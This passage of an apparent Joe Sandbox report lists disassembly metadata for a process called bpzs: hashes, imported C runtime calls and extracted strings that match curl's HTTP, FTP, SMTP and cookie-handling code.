                                      • Opcode Fuzzy Hash: 80daac59f8ca92fa118a95de044cdb50cbc06663b1a9f6a85e2ee34f832b41aa
                                      • Instruction Fuzzy Hash: 3DC1B162B0968285EB61AF25E4003B8E7A1FF4C788F884131CA6D077D5DF3DE549E798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isdigit$strtoll
                                      • String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$*$Content-Length:$HTTP 1.0, assume close after body$Lying server, not serving HTTP/2
                                      • API String ID: 1861613328-2566406286
                                      • Opcode ID: 96a6353c6a4c8853427061b31271766c075b274dfb65f4f7e4bb88fd55a527fe
                                      • Instruction ID: 52e2c56fbd6298a277c978cc850f61ce93f692762250d9ce3d2279c355555f6a
                                      • Opcode Fuzzy Hash: 96a6353c6a4c8853427061b31271766c075b274dfb65f4f7e4bb88fd55a527fe
                                      • Instruction Fuzzy Hash: 7AB18232A0868A86EB64EB34D5406B9F7A0FF09740F944135C76D836D1DF3CE469E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$__acrt_iob_func__swprintf_lisdigitmallocreallocstrtoul
                                      • String ID: %0*lu$internal error: invalid pattern type (%d)
                                      • API String ID: 2583327680-449433499
                                      • Opcode ID: ecfa5e0a059e389e4e897713cc00195ec912a4709ba26166db22909ef0071ff6
                                      • Instruction ID: bdba8a718e127bc3a340f77e81cd85a79c566de05880833fdf7e66565d48d189
                                      • Opcode Fuzzy Hash: ecfa5e0a059e389e4e897713cc00195ec912a4709ba26166db22909ef0071ff6
                                      • Instruction Fuzzy Hash: 5B61E522B0969186FB10EB61945027DEBA1BF08BA4F944236CE7E477C8CF3DD449D364
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: sendto$ErrorLast_time64
                                      • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
                                      • API String ID: 3931062552-1785996722
                                      • Opcode ID: 34f93355d8cc0b69f4b970b539c697f63924f867a5804110df025238e13daa21
                                      • Instruction ID: aac22e3a48717df1f146df548a5d9e7eb93bd5f5847b1810af5b49b85d686f6c
                                      • Opcode Fuzzy Hash: 34f93355d8cc0b69f4b970b539c697f63924f867a5804110df025238e13daa21
                                      • Instruction Fuzzy Hash: 02816172608782C5DB11DF29D4402A9BBA0FB8CF88F988136DE5C4B798DF39D409E764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isspacestrchr
                                      • String ID: %s$Connection$Content-Length$Content-Type:$Host:$Transfer-Encoding:
                                      • API String ID: 2446454806-3301244629
                                      • Opcode ID: c93511ca31ae1e178e181e653e9882967fd7a79f334b15c84d92c36a20aa74c1
                                      • Instruction ID: 32e68fce8f21d3451fafc511bb9adb201c12b9d28d6fa25b0d160074217844b6
                                      • Opcode Fuzzy Hash: c93511ca31ae1e178e181e653e9882967fd7a79f334b15c84d92c36a20aa74c1
                                      • Instruction Fuzzy Hash: 8B61D661A0D68381FB66AB219500779E390EF4DB94F88407ADA7C473C1DF6CE44DE3A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l
                                      • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                      • API String ID: 1488884202-2102732564
                                      • Opcode ID: bc8a0fb54b90ac0f7bfe28168100d6f44448ef39f7776423ce8e3178b32d9967
                                      • Instruction ID: 00e1cc682044e68aa8b8f43110821d95fdca7ed8434fd3618e777dc67275ae36
                                      • Opcode Fuzzy Hash: bc8a0fb54b90ac0f7bfe28168100d6f44448ef39f7776423ce8e3178b32d9967
                                      • Instruction Fuzzy Hash: 4D31A290F4A24B43EF18979A9C10BF4D2515F5ABA4FC44333D93E0FBC5D92CB14A66A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strchr.LIBVCRUNTIME ref: 00007FF7F8D1F22D
                                      • strchr.LIBVCRUNTIME ref: 00007FF7F8D1F254
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F309
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F344
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F373
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F394
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F3AB
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F3EE
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F430
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,00007FF7F8D1AF7F,?,?,CURLOPT_WRITEDATA,00000000,00000000,00007FF7F8D0FC4A), ref: 00007FF7F8D1F46D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc$strchr
                                      • String ID: CURLOPT_WRITEDATA
                                      • API String ID: 1280369219-1930637452
                                      • Opcode ID: 38ace2010ba47248945e977e3c3acff1b9855e0be08fb6d6534053a01ba8a616
                                      • Instruction ID: f4e2a9e087b0f7c1f2ce4f4c3fafbae6741b14ecb8b3bb10a2b7bf6b00cc7f22
                                      • Opcode Fuzzy Hash: 38ace2010ba47248945e977e3c3acff1b9855e0be08fb6d6534053a01ba8a616
                                      • Instruction Fuzzy Hash: 59717D2670EF8681EB61AF22B544279E654BF4CBD4F8C0031DD6E47794DE3CE409A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isprint$isalnumisalphaisdigit
                                      • String ID:
                                      • API String ID: 2067569585-0
                                      • Opcode ID: a3de9253c7231e816c75b2c98e02c393835685f05326b9624b908d9d58a4d418
                                      • Instruction ID: 9cd5f2168a7cd32a6b7a4bcb067f14163f2bef9f4391e84785d0fda124ea7ccd
                                      • Opcode Fuzzy Hash: a3de9253c7231e816c75b2c98e02c393835685f05326b9624b908d9d58a4d418
                                      • Instruction Fuzzy Hash: 19719111F1D58686FB75BB20945027DE691AF4D380F8C00B6D6AF476C5DE1CA88DB3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00000000,?,00007FF7F8D0FB02,?,?,?,?,00007FF7F8D013FB), ref: 00007FF7F8D0E831
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00000000,?,00007FF7F8D0FB02,?,?,?,?,00007FF7F8D013FB), ref: 00007FF7F8D0E84B
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00000000,?,00007FF7F8D0FB02,?,?,?,?,00007FF7F8D013FB), ref: 00007FF7F8D0E8A1
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00000000,?,00007FF7F8D0FB02,?,?,?,?,00007FF7F8D013FB), ref: 00007FF7F8D0E8BE
                                      • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00000001,00000000,?,00007FF7F8D0FB02,?,?,?,?,00007FF7F8D013FB), ref: 00007FF7F8D0E94E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strncmp$strtol
                                      • String ID: %s== Info: %s$I32$I64
                                      • API String ID: 1111410017-2208011497
                                      • Opcode ID: c04096f948adebf976991a9805ec52ce8d304ac47a3911ad3e4d168357decd78
                                      • Instruction ID: ddf91e787b485d29b833c9371a02df4270fbae9046b410f1dbba52082fdeb278
                                      • Opcode Fuzzy Hash: c04096f948adebf976991a9805ec52ce8d304ac47a3911ad3e4d168357decd78
                                      • Instruction Fuzzy Hash: 22F1B372E0860285EB24AB65D59427CEBA0FF4D744FD44139CB3E426D8DE7CE548E3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Authentication cancelled$DATA$DATA failed: %d$Got unexpected smtp-server response: %d$MAIL failed: %d$RCPT failed: %d$Remote access denied: %d$STARTTLS denied, code %d
                                      • API String ID: 0-70694958
                                      • Opcode ID: d2c4d19fe057aa2d15e5593dbf51bc97d1597357cecf44d6bf4686180d85b2ea
                                      • Instruction ID: ac509a5d345ceaf238e814ad4a96950591ced56c1fee0d87146991033b58b7b0
                                      • Opcode Fuzzy Hash: d2c4d19fe057aa2d15e5593dbf51bc97d1597357cecf44d6bf4686180d85b2ea
                                      • Instruction Fuzzy Hash: F091D662A0CA0381FB74BB28D454678E251EF48790FD44532CA6E476D1CF3DE54EE7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _strdupmallocrealloc
                                      • String ID: empty string within braces$nested brace$out of memory$range overflow$unexpected close bracket$unmatched brace
                                      • API String ID: 178021264-3046722810
                                      • Opcode ID: 1559cd0f34d86321bd4e5d6e5933fa2503e8acd2b0e57d20846665f4110d6d6a
                                      • Instruction ID: 397ff3e792c6e9c4081b3c22bb8e7867ec5f6fee6e426fdd53b2151236c14b23
                                      • Opcode Fuzzy Hash: 1559cd0f34d86321bd4e5d6e5933fa2503e8acd2b0e57d20846665f4110d6d6a
                                      • Instruction Fuzzy Hash: 1F51BC32A08A818AE764DB25A440A7DE7A4FF08744F944236CABD87798CF38E0499364
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _openstrchr
                                      • String ID: $Can't get the size of %s$Can't open %s for writing
                                      • API String ID: 174082288-3789703735
                                      • Opcode ID: 9911eb157b94b98a68b6795df6e5a78a1630acaaaba6a207328f8746794ac6f6
                                      • Instruction ID: 409aac5ca834446325befb5a1e4c0a8ce97c3aa8a60c0e38de046322ca13ad80
                                      • Opcode Fuzzy Hash: 9911eb157b94b98a68b6795df6e5a78a1630acaaaba6a207328f8746794ac6f6
                                      • Instruction Fuzzy Hash: DF51B362B0DE8281EB14AB25D4013BDE391FF88B90F984131DA6D477D5DF3CE409A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_funccallocfclosefopenfreemalloc
                                      • String ID: Set-Cookie:
                                      • API String ID: 2288824602-2427311273
                                      • Opcode ID: dd50c4d2b8d32825bb55764ea6ab04bb9949382792ad9dec23673867b9adca25
                                      • Instruction ID: e19c29d2689d2d231ed03f7721a32b1520aee565f72dcaf0bcabc8fae7bfc15e
                                      • Opcode Fuzzy Hash: dd50c4d2b8d32825bb55764ea6ab04bb9949382792ad9dec23673867b9adca25
                                      • Instruction Fuzzy Hash: E151E411A0D68685FB25BB21A810379D7907F2DB94FC80434EDBE067D1DE3CE54EA3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: File already completely downloaded$Instructs server to resume from offset %I64d$Maximum file size exceeded$Offset (%I64d) was beyond file size (%I64d)$REST %I64d$RETR %s$ftp server doesn't support SIZE
                                      • API String ID: 0-1342433468
                                      • Opcode ID: 91aa478b2e9d7b878d355bd8dd58b0924fcaee5e0a83c64d5f32d24b3641e91c
                                      • Instruction ID: 65faa402ed3d06c91d7069bf26469f711f58c1ff6b3f0e2bfbd259ffe97d8d81
                                      • Opcode Fuzzy Hash: 91aa478b2e9d7b878d355bd8dd58b0924fcaee5e0a83c64d5f32d24b3641e91c
                                      • Instruction Fuzzy Hash: 15412161A0978281FB14AB25F5403B9E260EF4D7A4F844235DA7E4B6C5DF7CE108B3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF7F8D2168C: _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000001,00007FF7F8D22B1A,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D216A5
                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D22B34
                                      • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D22B4A
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4), ref: 00007FF7F8D22B94
                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D22BA2
                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4), ref: 00007FF7F8D22BCB
                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D22BDB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: fclose$__acrt_iob_func_time64fopenfputsfree
                                      • String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s
                                      • API String ID: 1383513970-1525338603
                                      • Opcode ID: e3d50bc5cb7221297c70f51600728f0ab75f42ebdff02bbfe2d17ba2d816fd19
                                      • Instruction ID: 8e26ee5860e17a4b8aab40a212f99766efab35c9f432572cef5cc430a7c24660
                                      • Opcode Fuzzy Hash: e3d50bc5cb7221297c70f51600728f0ab75f42ebdff02bbfe2d17ba2d816fd19
                                      • Instruction Fuzzy Hash: 44316F20A0DA4281EB65BB11A810379E791AF4CB90FD80071DE6D077D9DF2CE849A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: AUX$CLOCK$$COM$CON$LPT$NUL$PRN
                                      • API String ID: 2803490479-925842913
                                      • Opcode ID: f9203dcf14122d08b6c06e7015c55c594028a73ca1ae6aed78f13cd572a09f9f
                                      • Instruction ID: 8e7d99d09baa6995c1e8e5fb22f61961ecd1884fb9cd50153e2435f6fedb8b13
                                      • Opcode Fuzzy Hash: f9203dcf14122d08b6c06e7015c55c594028a73ca1ae6aed78f13cd572a09f9f
                                      • Instruction Fuzzy Hash: 7E81B411A0D64341FB22BB51E4003FADA91AF5D7E4FC84131DEBE462D9EE2CE54DA3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc
                                      • String ID: %15[^?&/:]://%c$Disables POST, goes with %s$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET
                                      • API String ID: 2190258309-1733921125
                                      • Opcode ID: 1a21d5d9684b516ea9ff67633d1fccc164bd21274f2ebddc17af07331a320e0f
                                      • Instruction ID: ec0fe39a0451598a356b597eb49b2e71031392d3c13f30d26b7bcfdeabad621b
                                      • Opcode Fuzzy Hash: 1a21d5d9684b516ea9ff67633d1fccc164bd21274f2ebddc17af07331a320e0f
                                      • Instruction Fuzzy Hash: 3D71A3615097C286EB24BB25B4502BEE7E0FF48794F844135DEAE172D0DF3CE449A798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,CONNECT,?,00000000,00000000,?,?,Digest,?,?,00007FF7F8D29DC3), ref: 00007FF7F8D3AA10
                                      • strchr.LIBVCRUNTIME ref: 00007FF7F8D3AA5E
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,CONNECT,?,00000000,00000000,?,?,Digest,?,?,00007FF7F8D29DC3), ref: 00007FF7F8D3AB2F
                                        • Part of subcall function 00007FF7F8D40E90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D40F3A
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,CONNECT,?,00000000,00000000,?,?), ref: 00007FF7F8D3AB7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
